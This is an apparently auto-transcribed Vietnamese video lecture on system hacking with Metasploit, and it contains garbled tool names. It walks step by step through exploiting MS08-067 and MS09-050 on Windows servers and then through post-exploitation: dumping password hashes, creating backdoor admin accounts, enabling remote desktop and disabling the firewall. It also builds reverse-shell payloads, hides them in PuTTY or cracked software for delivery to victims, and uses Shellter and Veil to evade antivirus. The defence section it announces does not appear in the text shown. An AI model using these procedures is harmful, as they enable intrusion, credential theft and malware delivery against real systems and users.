Tiếp theo của phần System Hacking đó là phần 2 tấn công chiếm quyền sở hữu hệ thống và cách phòng chống. Thì như phần 1 tôi đã giới thiệu thì phần 2 rất là thú vị. Nội dung của phần 2 bao gồm những vấn đề như sau. Thứ nhất là giới thiệu về Meta Prime Framework. Đây là một cái ứng dụng, một cái phần mềm mà các hacker chuyên dùng để tấn công chiếm quyền sở hữu hệ thống. Rồi ngoài ra nó còn có một số cái tính năng khác nữa, như là trong phần scan về lỗ hổng bảo mật, Meta Prime cũng có thể scan được lỗ hổng bảo mật. Và cái phiên bản Meta, để mà sử dụng phiên bản Meta Prime mới nhất thì tôi sẽ hướng dẫn các bạn đó là update cho Meta Prime trên hệ điều hành Kali 2016. Và trên Kali 2016 cũng như Kali 2.0 thì nó có cái lỗi emitted. Emitted là một cái cũng một cái công cụ của Metaploit. Công cụ này sử dụng Metaploit theo giao diện. Và cái phần tiếp theo nữa đó là demo tấn công. Thì đây tôi sẽ demo tấn công các lỗ hổng bảo mật trên Windows để chiếm quyền sở hữu hệ điều hành Windows. Rồi ngoài ra nữa là tạo ra các cái reverse shell hay là những con backdoor để có thể là tấn công bất kỳ hệ điều hành nào. Và hướng dẫn là cách bypass anti-root và cuối cùng sẽ là cách phòng chống. Thì phần đầu tiên đó là giới thiệu về Metaploit. Thì Metaploit thì công dụng của nó là dùng để kiểm tra hay là tấn công khai thác lỗ hổng của hệ thống hay là dịch vụ. Đó. Rồi, Metaploit thì nó được xây dựng từ ngôn ngữ đó là Perl. C rồi là Assembler và Python. Rồi Metaploit thì có thể chạy được cả trên hệ điều hành Windows và Linux hay là Mac. Đấy, thì ở trên Linux thì tôi thường sử dụng Metaploit đã cài sẵn trên hệ điều hành Kali. Đó, có thể ngày trước thì chúng ta thấy là có cả phiên bản Metaploit trên hệ điều hành Backtrack nữa. Tuy nhiên là các bạn có thể cài trên Windows, môi trường Windows. Và chúng ta có thể vào cái trang đó là metaploit.com để download bản Metaploit về. Và Metaploit thì nó sẽ có hai phiên bản, một phiên bản free và một phiên bản trả phí. Và phiên bản trả phí thì công dụng của nó thì nó nhiều tính năng hơn, ai nó có thể update được những cái lỗ hổng mới đó. Hay chúng ta có thể thủ công update những lỗ hổng mới vào database của Metaploit. Rồi sau đó chúng ta sẽ đi tìm hiểu các thành phần của Metaploit. Thì giao diện quản trị thì tôi thường hay dùng hai cái giao diện, một trong hai giao diện nhé, nó có một trong hai cái cách để công cụ để quản trị, đó là dùng Metaploit Console chủ yếu bằng câu lệnh. Đúng không? Và cái cách thứ hai mà chúng ta có thể dùng thông qua giao diện đó là emitest. Thì lát nữa tôi sẽ hướng dẫn các bạn là sử dụng emitest và cách sửa lỗi emitest trong Kali 2016. Nhưng đối với tôi thì tôi thích dùng Metaploit Console hơn, bởi vì nó rất là, thứ nhất là nếu như sử dụng lệnh quen thì dùng cái này rất là mềm dẻo, đúng không? Và mượt mà. Tôi cảm giác như là nó chạy nhanh hơn so với lại công cụ emitest. Rồi đây là những cái hướng dẫn để sử dụng Metaploit và một số những cái khái niệm trên Metaploit thì các bạn có thể là sử dụng tài liệu của tôi để cập nhật thêm. Rồi khi mà dùng Metaploit với cái kiểu module đó là tấn công. Tấn công thì chúng ta sẽ thực hiện một vài những cái set những cái option như sau này. Thì tùy theo từng kiểu tấn công, ở đây Metaploit nó chia làm hai loại tấn công, hai kiểu tấn công, đó là thứ nhất đó là tấn công chiếm quyền sở hữu hệ thống và thứ hai đó là tấn công DDoS hay DOS.
một đối tượng nào đó, đúng không ạ? Thì với cái tấn công chiếm quyền hệ thống thì chúng ta lại chia làm hai kiểu, đó là tấn công dựa vào một lỗ hổng trên dịch vụ, hệ điều hành, hệ ứng dụng của Victim, sau đó là dùng Metabloid khai thác lỗ hổng đó và gửi yêu cầu kết nối tới Victim, tức là từ máy hacker gửi tới máy Victim. Kiểu tấn công thứ hai đó là tạo ra những cái reverse cell để mà Victim gửi kết nối về, ngược trở lại về máy hacker đó. Thì những cái option cần set thì lát nữa trong bài demo tôi sẽ hướng dẫn các bạn là set sau cho các kiểu của tấn công của Metaploid. Thì mỗi một kiểu nó lại có cách set khác nhau, các option khác nhau. Ở trong Metaploid khi mà tấn công chiếm quyền được hệ thống rồi thì chúng ta sẽ phải sử dụng những cái gói công cụ để mà điều khiển hệ thống Victim, đúng không ạ? Và những gói công cụ đó người ta gọi là Payload Master Printer. Nó được viết tắt của từ Meta Interpreter, tức là chiếm quyền gửi kết nối xong rồi thì chúng ta sẽ dùng các cái bộ công cụ, các cái tập lệnh ở trong gói Payload Master Printer để điều khiển. Và chúng ta chú ý là những Master Printer, Payload Master Printer là các thành phần mở rộng thì nó sẽ được thực thi trong bộ nhớ, hoàn toàn không ghi được lên đĩa, nên là có thể là tránh được sự phát hiện của các chương trình antivirus. Và các cái câu lệnh ở trong Master Printer thì nó rất nhiều, thì trong bài demo tôi sẽ hướng dẫn các bạn là sử dụng Master Printer, các tập lệnh của Master Printer, một số cái tập lệnh cơ bản có thể là chiếm toàn quyền hệ thống. Rồi, chúng ta hoàn toàn có thể, đây, tôi sẽ sử dụng, ở đây tôi sử dụng hệ điều hành Kali 2016 và tôi xem phiên bản của Metaploid của tôi đang sử dụng và dùng câu lệnh đó là MF console để mở ra công cụ Metaploid. Hoặc là các bạn có thể sử dụng một cái công cụ khác của cái giao diện khác của Metaploid, đó là Amitest. Và phiên bản của tôi đang là 4.11.5. Đây là cái ngày xuất bản phiên bản, đó là ngày giờ, đúng không ạ? Ngày 4 tháng 1 năm 2016. Bây giờ tôi sẽ update lên phiên bản mới. Phiên bản mới bây giờ là 4.12. Và tôi sẽ hướng dẫn các bạn update lên phiên bản mới. Rồi để update phiên bản mới thì trong công cụ Metaploid nó có cung cấp trong tạo một công cụ đó là MFS update. MFS update, chúng ta gõ câu lệnh này. Và để update được thì chắc chắn rằng máy Kali chúng ta sẽ phải kết nối được ra Internet. Chúng ta đợi một lát. Ok, tôi đã mở em bắt nét xong. Tuy nhiên khi mà chúng ta chạy Metaproid console lại thì nó sẽ bị lỗi. Mở console lại. Chúng ta chú ý chỗ này. Đó. Tại sao lỗi thì cái burner chưa được cài đặt, đúng không ạ? Thì bây giờ chúng ta sẽ thực hiện cài đặt cho burner. Rồi, thì tôi sẽ cd để mà sửa cái lỗi này. Đầu tiên tôi sẽ cd vào đường dẫn như sau. CD vào USR xe Metaploid framework. Rồi, sau đó là
apt-get. Cài đặt cái Ruby Rails. Install Ruby Rails. Ok. Sau khi cài xong Ruby Rails đầu tôi sẽ cài đặt cái phần ok cài đặt thành công và MSS console mở lại. Đó, Metaploid chúng ta bắt đầu chạy. Rồi thành công. Tiếp theo đó là trong Metaploid nó có một công cụ thứ hai đó là emitted để mà sử dụng. Tuy nhiên là công cụ này chúng ta xem mở lên nó sẽ gặp sự cố. Rồi, đây là một trong những lý do mà chúng ta không mở được emitest. Thì bây giờ tôi sẽ start cái database của emitest lên, tạo ra một database mới cho Metaploid. MSF database. Rồi cách ra init tạo database cho Metaploid framework. Rồi sau khi tạo xong rồi chúng ta mở emitted lên. Rồi, thành công đúng không ạ? Đấy là cách sửa lỗi emitted trong Metaploid đối với Kali 2.0 và Kali 2016. Tiếp theo đó là phần demo, phần này khá là hấp dẫn với các cái bài demo như sau. Thứ nhất là tôi sẽ chia những bài demo của tôi thành 3 kiểu. Kiểu thứ nhất đó là tấn công
dùng Metaploit để tấn công một máy cụ thể, một lỗ hổng cụ thể trên hệ điều hành hoặc trên ứng dụng hoặc là trên dịch vụ của hệ điều hành đó. Rồi, và cái kiểu tấn công này thì từ máy hacker sẽ gửi kết nối tới máy victim thông qua lỗ hổng dịch vụ. Đấy. Thì khi đó là chúng ta sẽ phải biết chính xác địa chỉ IP của victim. Đó. Và để gửi được kết nối tới máy victim thì IP của victim thì là IP LAN, đúng không? IP LAN tức là private IP. Ở một vài trường hợp chúng ta có thể dùng IP WAN, tuy nhiên là IP public này phải được gắn trực tiếp vào victim. Rồi, và các cái option cần thiết để mà set cho kiểu tấn công này. Thì đầu tiên chúng ta sẽ mở Metaploit lên bằng câu lệnh msf console. Và trong bài này tôi demo luôn tấn công hai hệ điều hành, nó Windows Server 2K3 và Windows Server 2K8 với các cái lỗ hổng cực kỳ nghiêm trọng. Đối với Windows Server 2K3 thì là MS08067 2K3 với IP. Còn đối với Windows Server 2K8 đó là MS09050. Và hai lỗ hổng này đều liên quan tới giao thức SMP, lỗ hổng trần bộ đệm của giao thức SMP. Đó. Và Metaploit của tôi đã update thành công lên phiên bản 4.12.15. Đó. Thì để mà tấn công kiểu này, kiểu 1, đầu tiên chúng ta phải search cái mã lỗ hổng. Đó. Search mã lỗ hổng. Đây. Đấy, giả sử tấn công Windows Server 2K3 thì tôi sẽ search cái mã lỗ hổng đó là MS08067 đúng không? Search trong database của Metaploit. Và tôi sẽ chuẩn bị môi trường để tấn công. Do mở nhiều máy quá nên là khá là chậm đúng không ạ? Và để mà setup được cái bộ lắp ảo nhiều máy như thế này thì máy thật của các bạn sẽ phải setup RAM phải tối thiểu 16 GB. Đó. Và cái với cái ổ HD thì chạy không ổn, phải dùng SSD, của tôi dùng SSD. Các bạn nên mua ổ SSD Samsung, đúng không? Của hãng Samsung thì nó sẽ tốc độ của nó chạy nhanh nhất và ổn định nhất. Thì có Samsung 850 Pro, không biết bây giờ chắc là ra 860 Pro rồi. Rồi sau khi mà search được cái đoạn mã tấn công, cái code tấn công, đường dẫn của code tấn công với cái lỗ hổng MS08067, tôi sẽ dùng option thứ hai đó là U. U sử dụng đoạn mã này. Rồi. Đấy, mình có thể là xem là những cái lỗ hổng này nó ảnh hưởng tới hệ điều hành gì. Đó, chúng ta có thể xét thêm nhé, show target xem các hệ điều hành nào sẽ bị ảnh hưởng. Đây là những hệ điều hành bị ảnh hưởng. Chúng ta có thể xem là nó hỗ trợ những payload nào, show payload.
rất nhiều, đúng không ạ? Rồi, và chúng ta có thể xem các option nào được set. Tuy nhiên đối với tấn công chiếm quyền sở hữu Windows thì chúng ta luôn luôn set cái option như sau. Set payload. Đầu tiên phải là payload. Payload là cái gì? Đấy. Nó là những cái gói câu lệnh để cung cấp cho hacker, cung cấp cho người tấn công, đúng không ạ? Để điều khiển máy vi tính khi mà chiếm được máy vi tính. Windows Master Printer Reverse TCP. Tôi hay dùng cái payload này. Rồi. Và với kiểu 1 thì chúng ta phải set này. Thứ nhất là lhost là localhost. Tức là chúng ta hình dung ra để tạo ra được một kết nối thì phải biết IP nguồn, IP đích, đúng không ạ? Và port nguồn, port đích, đúng không? Thì set lhost là localhost, chính là địa chỉ IP của máy hacker. Máy của tôi là .73.100. Rồi, và set rhost, rhost là remote host, là IP của máy victim. Tôi xem máy victim IP bao nhiêu. Rồi, 149. Show option để xem còn option nào cần set không. Đấy, thì chúng ta thấy là lport mặc định nó lấy 444 rồi. 444, chúng ta hoàn toàn có thể đổi lport, đúng không ạ? Thích lport nào thì tùy. Đấy, và cái vhost tức là ở đây là ảnh hưởng giao thức SNMP, SNMP hoạt động ở port 445 ạ. Đúng không ạ? Vhost nó đã set sẵn rồi. Rồi, sau đó chúng ta thực hiện exploit. Rồi, và khi cái cửa sổ câu lệnh Master Printer bật ra thì có nghĩa là chúng ta đã tấn công chiếm quyền đủ victim. Và một vài câu lệnh chúng ta có thể đây, có thể là dùng câu lệnh hack để xem là trong gói Master Printer này bao gồm đấy, những câu lệnh nào để mà tấn công victim. Ok, sysinfo. Hashdump get uid. Rồi, hashdump. Ok, đấy là file sam, đúng không ạ? Rồi, các user trên máy victim. Rồi, tiếp theo tôi hoàn toàn có thể dùng tiếp một số câu lệnh như sau, xem pwd xem đang ở đâu trên victim. CD về ổ C 2 chấm sửa. Rồi PWD lại. Ok, đang ổ C. LS xem dữ liệu ổ C. Rồi ok, đây là các dữ liệu trên ổ C. Tạo ra một thư mục hacker ạ, mkdir hacker. Rồi LS lại. Đấy, thư mục hacker được tạo. CD vào hacker chẳng hạn. Rồi, pwd xem lại, đúng hacker rồi. Rồi edit tạo ra một file này. File hack.tt. Và với nội dung đó là rồi, ok. Đấy. LS lại. Đúng file hưng tên là file hack. Được chưa? Get hack.txt. Ok. Đấy. Tạo user mới, đúng không ạ? Nâng quyền hoặc là mở remote desktop trên máy victim để chiếm toàn quyền luôn. Run get. Chúng ta chú ý câu lệnh này là không có ở trong head. Run get guy. Cách ra trừ -e để enable remote desktop từ xa máy victim.
Rồi ok, đã enable được remote desktop. Giờ tôi có thể là run dev trừ u tạo ra user hướng tên là 84 chẳng hạn. Rồi trừ p là password chấm abc. Chúng ta hoàn toàn có thể là vào được cell của máy victim bằng câu lệnh đó là cell để lấy cmd về. Đấy, và với user như thế này, với password như với user này, và user này chúng ta chú ý khi tạo ra thì nó được add luôn vào nhóm local admin và nhóm remote desktop user, nên suy ra remote desktop mở user hưng tên là tạo với quyền tương đương admin thì user này hoàn toàn có thể remote desktop từ sao vào. Chúng ta xem rồi, user hưng tên là quên hưng tên là gì, hưng tên là 84 đúng không ạ, chấm abc rồi vào thành công. Đấy, vào đây thành công. Với hưng tên là user quyền tương đương admin thì hưng tên là thích làm gì thì làm đúng không ạ, làm gì cũng được. Rồi ngoài ra nữa có thể giám sát trực tiếp bằng VNC, VNC thì khi đó nó sẽ gửi một VNC agent tới máy victim và sau đó là kết nối tới máy victim. À, sẽ chạy vài lần rồi ok thành công đúng không ạ. Rồi ngoài ra còn có thể đấy, lấy CMD của victim về. Ok, ở đấy là tấn công chiếm quyền sở hữu hệ điều hành Windows Server 2K3 thông qua lỗ hổng MS08067. Bây giờ tôi sẽ tấn công tiếp, thực hiện tấn công tiếp chiếm quyền sở hữu Windows Server 2K8 với lỗ hổng MS09050, cũng là một lỗ hổng trên giao thức SMP. Bây giờ tôi sẽ chuẩn bị môi trường. Rồi kiểm tra xem địa chỉ IP của máy Windows Server 2K8. Ok. À, và chuẩn bị thực hiện tấn công. MSS console mở lại. Rồi. Ok, bây giờ tôi sẽ search đúng không ạ? Giống như tấn công 2K3 thì đầu tiên search mã lỗ hổng MS 09 xếp trừ 050. Rồi IP là 178. Rồi sau khi search xong rồi, chúng ta chú ý là ở đây nó có lỗ hổng MS09050, nó có thể đốt, đánh đi đốt hoặc là đánh chiếm quyền sở hữu. Đấy. Muốn chiếm quyền sở hữu thì cái code ở bên dưới đó. Yêu
Rồi. Rồi sau khi mà user chúng ta xem nhé, show target xem lỗ hổng này ảnh hưởng tới các hệ điều hành nào. Windows Server 2K8, rồi SP1, SP2. Rồi set payload Windows U, sau đó set payload, set lhost, set rhost, master reader revert TCP. Rồi set tiếp đúng không ạ, lhost giống như tấn công 2K3, 192.168.73.100, đây là IP của máy hacker. Rồi set remote host rhost 192.168.73.178. Rồi show lại option xem còn option nào cần set không. Rồi rport là 445, còn lport đã set là 444 đúng không ạ. Rồi cái kiểu tấn công lỗ hổng này tôi đã ghi chú ra cho các bạn. Đây rồi, đúng không ạ? Rồi sau đó exploit luôn. Exploit. Rồi chúng ta thấy session 1 đã mở đúng không ạ, master Peter mở sys info, ok được chưa. Đấy, tôi có thể tấn công remote desktop luôn vào. Đấy, hoặc pwd lấy dữ liệu được chưa. Đấy, thì chúng ta có thể sử dụng các câu lệnh như là cdc 2 chấm rồi ls này, lấy dữ liệu về. Đấy, ví dụ mkd hacker tạo ra dữ liệu xong nó tự lấy đúng không ạ, cd vào hacker edit hưng tn chấm txt hưng tn được chưa, sau đó là dùng câu lệnh download chẳng hạn, cd lại c2 chấm xuống pwd download, dùng cái lệnh download để download dữ liệu về, hacker download folder này về, ok download thành công. Download thành công thì nằm ở đâu, hưng tn ở đây dùng hacker có file hưng tn, ok. Chúng ta cũng có thể dùng câu lệnh upload được chưa? Sau đó chỉ ra là cái đường dẫn của file một up là nó sẽ up lên ổ C, trong trường này up lên ổ C. Rồi run get cách get rồi cách ra trừ e enable remote desktop. Rồi tôi có thể xem là hash dump cũng được, hoặc là run cách get cách cách get file cách ra trừ u cách ra trừ p user thành công đúng không ạ. Đấy, tôi lại hoàn toàn có thể mở r desktop rồi thành công. Đấy.
user hướng tn password. Đây là môi trường domain rồi ạ. Thì nếu như trong trường hợp môi trường domain, chúng ta có thể gọi cell đấy, sau đó dùng câu lệnh user add cách ra user cách ra giả sử tôi cn bằng u1 vậy cn bằng user phẩy dc bằng vk kép phẩy dc bằng con tên domain đúng không ạ, cách ra trừ pvd tức là password chưa. Okay, comment ở đây hướng tên ở đây đây administrator ok remote desktop user thành công password 123.abc tại sao lại không được đúng không? Thôi được rồi có thể chạy run VMC để mà giám sát trực tiếp đúng không? Rồi đấy là cái lỗ hổng MS09050 trên Windows Server 2K8 đấy, cũng có thể chiếm quyền một cách chủ động, hoàn toàn chủ động máy chủ Windows Server 2K8 SP1 SP2. Rồi với cái kiểu thứ hai đó là reverse correction. Với kiểu này chúng ta hoàn toàn thể tấn công được qua mạng internet, bởi vì từ máy victim sẽ tạo ra một kết nối về máy hacker. Đấy, thì tôi không cần biết IP của victim là bao nhiêu, đúng không? Bởi vì victim tự kết nối về. Nếu trong trường hợp tôi là hacker. Đấy. Tuy nhiên là nó đây là một kiểu tấn công passive, tức là không được chủ động lắm, bởi vì nó sẽ phải dựa vào một hành động nào đó của victim để kích hoạt cái kết nối ngược trở về máy hacker. Rồi và với kiểu tấn công này thì cũng có thể bypass được hệ thống firewall trên máy victim hoặc firewall biên. Bypass firewall biên là trong trường hợp nào? Trong trường hợp firewall của hệ thống victim có thể mở những port 80 hay 443, thì khi đó hacker hoàn toàn có thể tạo ra được những cái con cell để cho hệ victim có thể revert về máy hacker thông qua port 80 và 443, tạo ra reverse question về máy hacker với port 80 và 43 và có thể đi qua được firewall, đúng không? Và với cái kiểu tấn công này thì chúng ta sẽ có tấn công rất đơn giản thôi, các cái option cần set rất đơn giản. Đấy, thì ở đây chúng ta không search mã lỗ hổng bởi vì đây có đâu phải là lỗ hổng, đúng không? Và đặc biệt là kiểu này thì kiểu tấn công reverse question thì hệ điều hành nào cũng tấn công được. Đấy, kể cả bản quyền hay vá lỗi. Đúng không ạ? Đây các option cần set này. Đầu tiên phải là U exploit multi handler. Sử dụng cái code này. Sau đó payload là Windows master printer reverse TCP và sau đó là localhost là IP của hacker. Rồi lport thì mặc định là cái kiểu tấn công này nó đã set cái lport là 4444. Chúng ta có thể đổi port. Nhưng đúng không ạ? Nhưng tuy nhiên là trong quá trình set cái con cell ấy, reverse cell port bao nhiêu, lport bao nhiêu thì trong kiểu tấn công này set lport là bấy nhiêu.
đấy, exploit và đợi. Ví dụ tấn công Windows Server 2012R2 thì đầu tiên là tức là tôi sẽ tạo ra các con shell để tấn công. Thì cái con shell đầu tiên là một con shell thô. Sau đó là kịch bản như sau này, tạo ra một con shell với các option như sau: lhot và lport, sau đó gửi tới máy victim. Thì bằng rất nhiều cách để gửi vào máy victim, có thể gửi thông qua một hệ thống email hay là bin nó vào một file ghép, wrap nó vào một cái file được phép hay là người dùng hay sử dụng chẳng hạn, ví dụ như là những file YubiKey này, những file portable thôi, hay là cho vào một cái file crack, đánh vào cái tâm lý người dùng là hay dùng hay sử dụng những cái ứng dụng crack ấy. Thì bin nó vào một file crack, sau đó là đấy, khi mà victim sử dụng cái file này thì download cái file này về và sử dụng file này thì ngay lập tức tạo ra một reverse correction về máy hacker và victim sẽ bị chiếm quyền sở hữu. Đấy, rất nhiều cách nữa. Thì bây giờ là cái đầu tiên là tôi sẽ hướng dẫn các bạn tạo ra một con shell thô, tức là chưa hề có những cái thủ thuật như bypass, antivirus. Đấy. Và với con shell thô này tạo ra thì tất cả các chương trình antivirus sẽ phát hiện và tiêu diệt. Rồi, chúng ta set một số những cái option cần set. Trên Windows thì là trừ P, Windows Master Breather Revert TCP, P là platform. Rồi set cái lhot là địa chỉ IP của máy hacker. Rồi lport là hacker tự định nghĩa ra, đúng không ạ? Đấy. Có thể lport là port 80 thì có thể bypass được những cái firewall, hệ thống firewall trên máy, trên trên hệ thống mạng của victim hoặc là trên chính máy của victim. Giả sử tôi set 4444 hay là 80 4444. Chữ F là format theo kiểu là SQL file shell.exe. Ok. Đấy, vậy là tôi đã tạo ra được một con shell. Đây, shell.exe. Bây giờ tôi sẽ đẩy nó sang máy victim. Thì ở đây các bạn có thể đẩy thông qua rất nhiều cách như vừa rồi tôi đã kể ra một vài cách. Shell.exe ở đâu rồi? Đây ạ. Rồi. Giả sử trong trường hợp này tôi muốn tấn công máy chủ Windows Server 2012. Với kiểu này chúng ta tấn công hệ điều hành nào cũng được. Nhưng với con shell thô này thì antivirus sẽ phát hiện và detect và tiêu diệt ngay. Thì sau cái bước này tôi sẽ hướng dẫn các bạn một thủ thuật là bypass antivirus. Với cái hướng dẫn này thì có nghĩa là chúng ta hiểu được cái ý nghĩa của con shell để tạo ra. Hacker sẽ, nếu một hacker giỏi, tinh vi đấy, thì có nhiều kỹ năng thì họ có hoàn toàn thể bypass được tất cả các chương trình antivirus và có hoàn toàn để tấn công được mọi hệ thống.
setup môi trường. Rồi, để cho cùng cắt nát. Ok, và tôi sẽ bật trước, hứng trước connection mà victim sẽ kết nối ngược về. Nó sự metaploy. Sau đó tôi sẽ thực hiện đẩy con cell vào máy victim. Đợi victim kích vào là rồi, sau đó là yêu, đúng không ạ? Cả option cần set trong cuộc tấn công này thì luôn luôn là yêu này, exploit, multi handler, rồi set payload. Chiếm quyền sở hữu bao giờ cũng phải set payload, bởi vì chúng ta luôn nhớ là gói payload là gói mà cung cấp cho chúng ta những câu lệnh để mà điều khiển victim, đúng không? Payload window. The master breeder river TCP. Rồi set tiếp. Ở đây r hot r, chúng ta nên nhớ đây là revert question, nên là bất kỳ máy nào chạy con cell này cũng đều bị dính hết, đúng không? Cũng đều bị chiếm quyền sở hữu, nên là cái r hot là chúng ta sẽ không set. Set l hot kết nối về đâu, 192.168.73.100 là máy hacker. Rồi l port, là chú ý trong con cell chúng ta set cái l port như thế nào thì đây l port là như vậy. Còn nếu trong con cell l port vừa rồi tôi set là 444 thì mặc định cái kiểu tấn công này nó đã, đây chúng ta có thể, nó đã set cái option l port là 444 rồi. Đấy. Tại sao không set r port? R port là remote port thì đó là chúng ta cũng nhớ là victim nó thực hiện connection về máy hacker, nên là l port, à r port chính là port trên máy victim sẽ là port ngẫu nhiên, đúng không ạ? Vậy là đã hoàn toàn đủ để mà thực hiện một kết nối thông qua port 44. Sau đó tôi exploit. Rồi, và đợi là sự trong trường hợp này victim chạy con cell này. Chúng ta xem kết quả. Ok. Đấy, là chiếm toàn quyền máy victim. Sys info. Rồi, máy 2012R2 này. Được chưa? Remote desktop luôn vào. Run. Và các câu lệnh trong master breeder thì các bạn gõ câu lệnh help để mà ra những cái trang hướng dẫn của câu lệnh à, thì các bạn sẽ tự tìm hiểu. Đấy, thì những câu lệnh này thì dùng một vài lần thì chúng ta sẽ quen ngay. Run get go trừ e enable remote desktop trên máy victim. Rồi đã mở được remote desktop, sau đó là run get, run cách get vui trừ u trừ p rồi thành công. Ok, remote trực tiếp vào máy victim và chiếm toàn quyền sở hữu. Trên máy victim là đang enable firewall, đúng không ạ? Chúng ta có thể dùng lệnh để disable firewall đi. Đấy, thì muốn vào lệnh thì chúng ta có thể dùng cell lấy về CMD, đúng không ạ? Và với CMD này thì mình làm gì cũng được. Disable firewall thì netsh, đúng không ạ?
nó toàn quyền trên hệ thống lấy được dữ liệu về. Rồi, cứ cửa sổ master reader bật ra có nghĩa là chúng ta đã vào được máy victim. Đó là kiểu tấn công bằng con shell thô. Bây giờ tôi sẽ tạo ra những cái con shell với thủ thuật kèm theo các thủ thuật để bypass được antivirus. Đầu tiên tôi sử dụng một rất nhiều phương pháp có thể mã hóa và bypass antivirus, thì theo thống kê tới thời điểm này thì chỉ có con shell container của tôi là có thể là bypass được nhiều nhất các chương trình antivirus. Với con shell này thì tôi sẽ xem lại chút. Ở đây rồi tôi sẽ dùng một ứng dụng có tên là sử dụng những cái ứng dụng Win32 nhé, có thể dùng Netcat hoặc là Putty. Đấy, ví dụ tôi dùng Putty để bin hoặc encode cái con shell tôi tạo ra, chọn option A, mở lên target là đường dẫn tới cái file mà chúng ta muốn encode putty.make. Rồi ok, chỗ này chọn stream mode thì chọn no nhé. Rồi chọn L để tạo ra những cái listen đúng không ạ? Rồi index mà set cái payload là 1. Ok, set L hot. IP của máy hacker, set L port. L port ở đây là giả sử tôi dùng port 444. Rồi thành công. Đấy, và con shell của tôi đã được tạo ra. Nó tên là Putty đúng không ạ? Shell nó đã được encode vào đây rồi, bin cái code của con reverse shell vào phần mềm Putty. Đấy, ví dụ bây giờ mà tôi thực hiện tấn công nhé, chiếm quyền luôn máy Win 10, máy thật, và tôi sẽ test thử trước khi tấn công, tôi sẽ test thử xem là bao nhiêu phần mềm antivirus phát hiện ra con shell này. Thì ngay cả Windows Defender ở trên Windows 10, Win 10 của tôi, Win bản quyền update mới nhất cũng không phát hiện được. Bây giờ nha, tôi sẽ dùng cái trang virustotal.com. Sau đó kéo con shell vào đây để test thử. Con Putty này. Rồi scan.
Chúng ta xem kết quả. À, kết quả chúng ta thấy là 3 trên 53 đúng không ạ? Đấy. Và những cái ứng dụng antivirus mà thường xuyên sử dụng như là ABG này, Bybat này, được chưa? Bitdefender, BKV, CMC, ClamAV và cả Kaspersky, Microsoft Defender, đấy chúng ta thấy không? McAfee đúng không ạ? Symantec thì chỗ này chỉ có ba thôi, ba cái phần mềm rất lạ đúng không ạ? Rồi sau khi mà tạo cell thành công, tôi sẽ thực hiện là tấn công Uexploit Multi Handler Set Payload Window Window Master Printer Revert TCP rồi Set LHOT và thực hiện exploit. Sau đó đợi vậy là cái correction ở trên máy tôi thể power đi. Thực hiện tấn công trên máy Win 10 của tôi. Rồi, thành công. Sysinfo Windows 10 PWD OD LS đấy, còn PuTTY chính nó đây ạ. Đào thử một dữ liệu nào đó về data.docx này. Download. Rồi, thành công. Mở data lên. Chả có gì đúng không ạ? Đấy. Đấy, tôi tấn công chiếm quyền sở hữu Win 10 thông qua con backdoor cell được tạo bởi ứng dụng Shelter Hưng Tiên à. Thì với ứng dụng này chúng ta có thể là tạo cell và đồng thời mã hóa, rồi là mã hóa code của cell, rồi là encode và pin nó vào một chương trình Win 32 như là PuTTY hay là Netcat để nó gửi tới victim, victim vô tình chạy cái này thì nó sẽ tạo ra một revert question kết nối về máy hacker. Và với cái revert question như thế này thì tôi còn một cái ứng dụng nữa, đó là Vay. Và với ứng dụng Vay có thể tạo được cả cell và bypass antivirus mã hóa bởi Python và bypass AV. Ngoài ra còn tạo ra được những cái code macro để inject vào Office. Thì các cái bước để cài đặt Vay, đây tôi đã hướng dẫn rất cụ thể. Đầu tiên chúng ta download Vay từ cái đường dẫn như này. Đấy. Sau đó cài, cài thì chúng ta sẽ gặp lỗi, đúng không ạ? Thì trong quá trình cài chúng ta nên update cho cái APT, update thêm thư viện
trong quá trình cài nó phải cài rất nhiều các cái ứng dụng phụ thuộc, hay là cần phải download rất nhiều thư viện về để cài, thì chúng ta nên update cho apt-get. Thì trước khi update thì chúng ta sẽ vào file script, gedit vào file này, sau đó thêm vào cuối file hai dòng như này, bởi vì cái đường link này thì nó chứa rất nhiều các thư viện và những phần mềm phụ thuộc của cái họ hệ điều hành Debian, mà Kali là một trong những hệ điều hành thuộc họ này. Sau đó là chúng ta chấm suộc setup .sh và cài. Đấy. Thì ở đây cài, quá trình cài nó diễn ra rất là lâu. Đây, tôi có thể hướng dẫn qua một chút cho các bạn bằng video. Đầu tiên nhé, download về thì đây, tôi sẽ dùng copy luôn cái mà tôi đã download rồi. Đợi một chút. Rồi, tôi đã copy cái vây vào profile group. Tiếp theo là tôi sẽ cấp phép chmod 755 trừ r nhé, nhớ trừ r để kế thừa vào trong. Rồi, và ok. Sau khi trừ r rồi, ta làm theo file hướng dẫn. Rồi, vào file script. Rồi, vào file script, bởi vì bình thường chúng ta cài sẽ báo lỗi ngay. Và cài này rất mất thời gian. Gedit etc apt script. Được chưa? Và thêm vào cuối file hai cái dòng này. Hai link rồi, thành công rồi. Sau đó apt trừ ghép chúng ta chú ý là phải có mạng internet đúng không ạ, và mạng phải đường truyền cao nhanh thì chúng ta sẽ update nhanh. Rồi, sau khi update xong rồi cd vào v ls này. Ông ta chú ý nhé, sau khi mà cd vào trong v rồi, chúng ta thấy một thư mục setup và chúng ta tiếp tục cd vào thư mục setup và chạy file nó chấm suộc setup.sh. Và sau đó cứ thế là chọn yes và đợi đợi một lúc sau thì quá trình cài đặt thành công thì chúng ta sẽ sử dụng vây. Như của tôi cài đặt thành công rồi, tôi sẽ hướng dẫn các bạn là sử dụng các option trong vây để tạo ra những con reverse shell. Tạo ra một con reverse shell được ngôn ngữ Python đúng không? Có mã hóa thì đầu tiên là chúng ta sử dụng rồi chọn payload, thì đây tôi sẽ chọn payload đây Python tức là 34.
Rồi trong cái playlist này thì cần phải set những vấn đề như sau: set là hot, L port là 44 rồi, được chưa? Và tiếp theo nữa là U, set U tức là sự phương pháp mã hóa JS. Và range rest để tạo cell. Rồi đặt tên cho con cell. Rồi chọn một. Ok, con cell hưng.tn.make đã được tạo ra đường dẫn này. Rồi, sau đó là tôi sẽ thực hiện. Copy, rồi, lệnh cp. Cp này cho ra desktop. Ở đây chính là cell hưng.tn.make, là cell này được viết dưới dạng Python và đã được mã hóa. Đấy, chúng ta kiểm tra thử xem. Rồi, đây là cell hưng.tn và độ bypass của nó này. Check luôn cái độ bypass antivirus. Tất nhiên là sẽ không bằng được con cell hưng.tn cell tơ tạo ra. Tất nhiên là những cái chương trình antivirus mà thường xuyên dùng như Kaspersky, BKV hay Microsoft Defender là cũng không thể phát hiện được. Đây, chúng ta có thể xem kết quả BKV này, CMC, Claim. Claim thì được dùng nhiều trên hệ hành Linux, nó được tích hợp vào các firewall, mềm. 